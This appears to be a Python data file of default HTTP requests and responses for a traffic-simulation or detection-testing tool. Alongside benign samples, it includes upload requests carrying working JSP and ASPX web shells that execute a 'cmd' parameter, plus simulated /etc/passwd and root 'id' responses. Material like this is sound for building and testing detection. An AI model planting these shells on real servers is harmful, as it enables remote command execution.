"""
    添加默认请求/响应时的数据
"""
from random import *
from datetime import datetime

default_req_dict = {
    "默认GET": "GET /index.html?index=1 HTTP/1.1\r\nHost: 192.168.57.160\r\nConnection: close\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n\r\n",
    "默认POST": "POST /index.html HTTP/1.1\r\nHost: 192.168.48.147\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 30\r\n\r\nusername=admin&password=123456",
    "默认上传PHP一句话": 'POST /upload.php HTTP/1.1\r\nHost: 192.168.36.152\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\r\nAccept-Encoding: gzip, deflate, br, zstd\r\nAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygfd0H3RWDeNNLaPy\r\nContent-Length: 194\r\n\r\n------WebKitFormBoundarye776qKJKlcGtVlH5\r\nContent-Disposition: form-data; name="file"; filename="1.php"\r\nContent-Type: image/png\r\n\r\n<?php phpinfo();?>\r\n------WebKitFormBoundarye776qKJKlcGtVlH5--',
    "默认上传JSP一句话": 'POST /upload HTTP/1.1\r\nHost: 192.168.25.174\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: zh-CN,zh;q=0.9\r\nCookie: JSESSIONID=3643f3f44448080317dcefa4d4f958e8\r\nContent-Type: multipart/form-data; boundary=----21909179191068471382830692394\r\nConnection: close\r\nContent-Length: 247\r\n\r\n------21909179191068471382830692394\r\nContent-Disposition: form-data; name="files"; filename="2.jsp"\r\nContent-Type: image/jpeg\r\n\r\n<% Process process = Runtime.getRuntime().exec(request.getParameter("cmd")); %>\r\n------21909179191068471382830692394--',
    "默认上传ASP一句话": 'POST /FileUpload.aspx HTTP/1.1\r\nHost: 192.168.14.213\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,\r\nX-Requested-With: XMLHttpRequest\r\nContent-Type: multipart/form-data; boundary=----21909179191068471382830692394\r\nConnection: close\r\nContent-Length: 684\r\n\r\n------21909179191068471382830692394\r\nContent-Disposition: form-data; name="File"; filename="shell.aspx"\r\nContent-Type: image/jpeg\r\n\r\n<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>\r\n------21909179191068471382830692394--',
    "随机TCP请求（长度100）": "".join([choice("0123456789abcdef") for i in range(200)])
}

default_rsp_dict = {
    "默认响应（200）": f"HTTP/1.1 200 OK\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nServer: nginx\r\nDate: {datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')}\r\nContent-Length: 6\r\nConnection: close\r\n\r\nhidden",
    "默认响应（404）": f'HTTP/1.1 404 Not Found\r\nDate: {datetime.utcnow().strftime("%a, %d %b %Y %H:%M:%S GMT")}\r\nServer: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02\r\nContent-Length: 321\r\nConnection: close\r\nContent-Type: text/html; charset=iso-8859-1\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /dsaf was not found on this server.</p>\n<p>Additionally, a 404 Not Found\nerror was encountered while trying to use an ErrorDocument to handle the request.</p>\n</body></html>\n',
    "默认响应（500）": f"HTTP/1.1 500 Internal Server Error\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nServer: nginx\r\nDate: {datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')}\r\nContent-Length: 12\r\nConnection: close\r\n\r\nServer Error",
    "响应/etc/passwd": f"HTTP/1.1 200 OK\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nServer: nginx\r\nDate: {datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')}\r\nContent-Length: 2491\r\nConnection: close\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\r\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\r\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\r\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\r\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\r\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\r\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\r\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\r\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\r\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\r\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\r\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\r\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\r\nsystemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin\r\nsystemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin\r\nsyslog:x:102:106::/home/syslog:/usr/sbin/nologin\r\nmessagebus:x:103:107::/nonexistent:/usr/sbin/nologin\r\n_apt:x:104:65534::/nonexistent:/usr/sbin/nologin\r\nuuidd:x:105:111::/run/uuidd:/usr/sbin/nologin\r\navahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin\r\nusbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\r\ndnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\r\nrtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\r\ncups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin\r\nspeech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\r\nwhoopsie:x:112:117::/nonexistent:/bin/false\r\nkernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin\r\nsaned:x:114:119::/var/lib/saned:/usr/sbin/nologin\r\npulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\r\navahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\r\ncolord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\r\nhplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false\r\ngeoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin\r\ngnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false\r\ngdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false\r\nubuntu:x:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash\r\nsshd:x:122:65534::/run/sshd:/usr/sbin/nologin",
    "响应id命令执行结果": f"HTTP/1.1 200 OK\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nServer: nginx\r\nDate: {datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')}\r\nContent-Length: 38\r\nConnection: close\r\n\r\nuid=0(root) gid=0(root) groups=0(root)",
    "随机TCP响应（长度100）": "".join([choice("0123456789abcdef") for i in range(200)])
}
